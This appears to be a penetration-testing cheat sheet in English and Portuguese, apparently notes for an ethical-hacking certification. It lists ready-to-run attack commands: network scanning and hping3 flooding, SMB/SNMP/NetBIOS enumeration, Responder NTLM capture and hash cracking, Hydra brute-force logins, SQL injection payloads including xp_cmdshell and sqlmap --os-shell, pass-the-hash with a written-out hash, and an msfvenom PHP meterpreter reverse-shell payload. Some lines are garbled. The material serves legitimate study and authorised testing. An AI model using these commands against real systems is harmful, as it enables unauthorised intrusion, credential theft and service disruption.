- ping URL –f –l 1500 -> Frame size
- tracert URL -> Determining hop count
- msfdb init
- service postgresql start
- msfconsole
- msf > db_status
- nmap -Pn -sS -A -oX Test 10.10.10.0/24
- db_import Test
- hosts -> To show all available hosts in the subnet
- db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine
- services -> to get all available services in a subnet
SMB Version Enumeration using MSF
- use scanner/smb/smb_version
- set RHOSTS 10.x.x.x-X
- set THREADS 100
- run
- hosts -> now exact os_flavor information has been updated
SMB Commands
- nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
- smbclient ///anonymous
- smbget -R smb:///anonymous
-
Hping3
-
Port ****Scanning using Hping3: hping3 --scan 1-3000 -S 10.10.10.10 --scan parameter defines the port range to scan and –S represents SYN flag.
-
Pinging the target using HPing3: hping3 -c 3 10.10.10.10 -c 3 means that we only want to send three packets to the target machine.
-
UDP Packet Crafting hping3 10.10.10.10 --udp --rand-source --data 500
-
TCP SYN request hping3 -S 10.10.10.10 -p 80 -c 5
-S will perform TCP SYN request on the target machine, -p will pass the traffic through whichport is assigned, and -c is the count of the packets sent to the Target machine. -
HPing flood hping3 10.10.10.10 --flood
-
-
Nmap
- Scan a subnet - nmap 20.0.20.0/24
- Scan targets from a text file nmap -iL list-of-ips.tx
- Scan a single Port nmap -p 22 20.0.20.1
- Scan a range of ports nmap -p 1-100 20.0.20.1
- Scan 100 most common ports (Fast) nmap -F 20.0.20.1
- Scan all 65535 ports nmap -p- 20.0.20.1
- Scan using TCP connect nmap -sT 20.0.20.1
- Scan using TCP SYN scan (default) nmap -sS 20.0.20.1
- Scan UDP ports nmap -sU -p 123,161,162 20.0.20.1
- Scan selected ports – ignore discovery nmap -Pn -F 20.0.20.1
- Detect OS and Services nmap -A 20.0.20.1
- Standard service detection nmap -sV 20.0.20.1
- nmap -O
- nmap –packet-trace
- nmap -sT -T3 -A
- nmap -sA -v -T4
- nmap -sP , nmap -D RND
- nmap -mtu 8
- nmap -v -sS -T5
- nmap -sV -Pn
- nmap -sP
- nmap -sA
- nmap -sV -A -F
- nmap -sS
- nmap -p- –max-rtt-timeout 50ms, nmap -v -sS -f -T5
-
Netdiscover
- netdiscover -i eth0
- netdiscover -i eth0 -r
SNMP Enumeration
- nmap –sU –p 161 192.168.0.X
- nmap -sU -p 161 --script=snmp-brute 192.168.0.X
- msfconsole
- use auxiliary/scanner/snmp/snmp_login
- set RHOSTS and exploit
- use auxiliary/scanner/snmp/snmp_enum
- set RHOSTS and exploit
NetBIOS Enumeration
- nbtstat –A 192.168.0.X
- net use
- net use \192.168.0.X\e ““\user:””
- net use \192.168.0.X\e ““/user:””
- NetBIOS Enumerator
Enum4Linux Wins Enumeration :
- enum4linux -u user -p password -U 10.x.x.x -> Users Enumeration
- enum4linux -u user -p password -o 10.x.x.x -> OS Enumeration
- enum4linux -u user -p password -P 10.x.x.x -> Password Policy Information
- enum4linux -u user -p password -G 10.x.x.x -> Groups Information
- enum4linux -u user -p password -S 10.x.x.x -> Share Policy Information (SMB Shares Enumeration
Active Directory LDAP Enumeration : ADExplorer
-
nikto -h http://target -Tuning 1
-
Nessus runs on https://localhost:8834
Username: admin Password: password
-
Nessus -> Policies > Advanced scan
-
Discovery > Host Discovery > Turn off Ping the remote host
-
Port Scanning > check the Verify open TCP ports found by local port enumerators
-
Advanced
Max number of TCP sessions per host and = unlimited Max number of TCP sessions per scan = unlimited
-
Credentials > Windows > Username & Password
-
Save policy > Create new scan > User Defined
-
Enter name & Target
-
Schedule tab > Turn of Enabled
-
Hit launch from drop-down of save.
-
wfuzz wfuzz -c -z file,common.txt --hc 404 http://site.com.br/FUZZ
-
gobuster gobuster dir -u IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html
NTLM Hash crack
- responder -I eth0
- usr\share\responder\logs --> Responder log location
- john /usr/share/responder/logs/ntlm.txt
Rainbow table crack using Winrtgen
- Open winrtgen and add new table
- Select ntlm from Hash dropdown list.
- Set Min Len as 4, Max Len as 6 and Chain Count 4000000
- Select loweralpha from Charset dropdown list (it depends upon Password).
- rcrack_gui.exe to crack hash with rainbow table
Hash dump with Pwdump7 and crack with ophcrack
- wmic useraccount get name,sid ****--> Get user acc names and SID
- PwDump7.exe > c:\hashes.txt
- Replace boxes in hashes.txt with relevant usernames from step 1.
- Ophcrack.exe -> load -> PWDUMP File
- Tables -> Vista free -> select the table directory -> crack
-
Wireshark Filters
-
Filter HTTP traffic by issuing http.request.method == “POST”, http.request.uri matches “pattern”
-
Filter TCP traffic tcp.port eq 25 or icmp, tcp.window_size == 0 && tcp.flags.reset != 1
-
“ip.addr” matches against both the IP source and destination addresses in the IP header. The same is true for “tcp.port”, “udp.port”, “eth.addr”, and others http.request.method == “POST” -> Wireshark filter for filtering HTTP POST request
Show only traffic between source and destination
- ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
- ip.src==10.20.20.5 and ip.dst==201.22.7.102
Filter (Contains)
- http.request.uri matches "gl=se$" - OBS: The $ character is a PCRE punctuation charactPa$$w0rder that matches the end of a string.
- http.request.uri contains admin
- tcp contains admin
- udp contains 81:60:03
- sip.To contains "a1762"
Filter TTL - ip.ttl == 64
-
TCPDump
-
tcpdump -v -i eth0 -w nome.pcap
-
tcpdump -v -i eth0 icmp -w icmp.pcap
Show only traffic between source and destination
- tcpdump -vnr file.pcap host 192.168.0.X
- tcpdump -vnr file.pcap src host 192.168.0.X
- tcpdump -vnr file.pcap dst host 192.168.0.X
- tcpdump -vnr file.pcap src host 192.168.0.1 and dst host 192.168.0.2
Filter Ports
- tcpdump -vnr file.pcap port 80
Show details protocol ethernet
- tcpdump -er file.pcap
Filter Protocol
- tcpdump -vnr file.pcap udp
Filter strings
- tcpdump -vnr file.pcap | grep “PASS”
== Flags TCPDump ==
[S] - SYN [S.] - SYN, ACK [.] - ACK [P.] -
- FTP Bruteforce with Hydra
- hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://IP
Wordpress - wpscan --url http://IP --enumerate u
Wordpress password bruteforce
msfconsole - use auxiliary/scanner/http/wordpress_login_enum
RCE - ping 127.0.0.1 | hostname | net user
- SQL queries
- ’ or 1=1 —
- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
- ‘ OR ‘1’=’1′ —
- ‘ OR ‘1’=’1′ /*
- MySQL
- ‘ OR ‘1’=’1′ #
- Access (using null characters)
- ‘ OR ‘1’=’1′ %00
- ‘ OR ‘1’=’1′ %16
Using sqlmap
- Extract DBS
- sqlmap -u http://www.example.com/viewprofile.aspx?id=1” -cookie="xookies xxx" --dbs
- Extract Tables
- sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example --tables
- Extract Columns
- sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example -T User_Login --columns
- Dump Data
- sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" -D example -T User_Login --dump
- OS Shell to execute commands
- sqlmap -u “http://www.example.com/viewprofile.aspx?id=1” --cookie="cookies xxx" --os-shell
Others
- Login bypass
- blah' or 1=1 --
- Insert data into DB from login
- blah';insert into login values ('john','apple123');
- Create database from login
- blah';create database mydatabase;
- Execute cmd from login
- blah';exec master..xp_cmdshell 'ping www.target -l 65000 -t'; --
Brute Force
-
Hydra
- hydra -L ../.. /User.txt -P ../../../Pass.txt ftp://< target of evaluation >
- hydra -L ../.. /User.txt -P ../../../Pass.txt ssh
- hydra -l admin -P/usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form “/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout” -vV -f
- hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login” -vV -f
- hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
-
hydra -l roger -P lists/pass.txt 192.168.56.117 -V http-form-post ¨/imfadministrator/:user=^USER^&pass=^PASS:F=Invalid username.¨
-
John
-
PassTheHash
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.167.10 cmd
Criar login blah';insert into login values ('john','apple123'); --
.\SNOW.EXE -C -m "A conta do meu banco é 45656684512263" -p "magic" .\secrete_encrypt2.txt .\SNOW.EXE -C -p "magic" .\secrete_encrypt.txt snow -C -p "magic" readme2.txt
snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw
"dir flag* /s /p"
ntfs data stream criar um arquivo cehv11.txt com texto echo "novo texto" > cehv11.txt:stream1
recuperar more < cehv11.stream1
descobrir nfs data stream dir /r